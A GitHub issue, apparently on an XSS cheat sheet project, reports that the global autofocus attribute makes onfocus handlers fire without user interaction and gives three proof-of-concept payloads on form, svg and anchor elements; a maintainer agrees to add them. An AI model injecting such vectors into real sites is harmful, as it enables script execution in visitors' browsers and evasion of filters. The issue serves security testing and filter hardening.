Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

autofocus on elements with tabindex=1 fires onfocus event directly #62

Closed
filipnyquist opened this issue Jun 3, 2024 · 2 comments
Closed

autofocus on elements with tabindex=1 fires onfocus event directly #62

filipnyquist opened this issue Jun 3, 2024 · 2 comments

Comments

@filipnyquist
Copy link

Hi!
While doing some testing we ran into this PR whatwg/html#4830.
It seems to have added autofocus to the global attribute list, allowing it to be used on ALL elements with the type of HTMLOrSVGElement.

This, in turn, means that it is possible to, for example, run any of the following without user interaction in current browsers (no need for TAB):

<form tabindex=1 autofocus onfocus=alert(1)></form>

<svg width="100" height="100" tabindex=1 autofocus onfocus=alert(24)> <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" /> </svg>

<a href=# autofocus onfocus=alert(1)>

Could we update the cheatsheet to reflect this somehow? Open for suggestions 😄
@hackvertor
Copy link
Collaborator

Thanks for the issue, as mentioned on Twitter I'll update the data to reflect this.

@hackvertor
Copy link
Collaborator

This will be in the next release

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@hackvertor @filipnyquist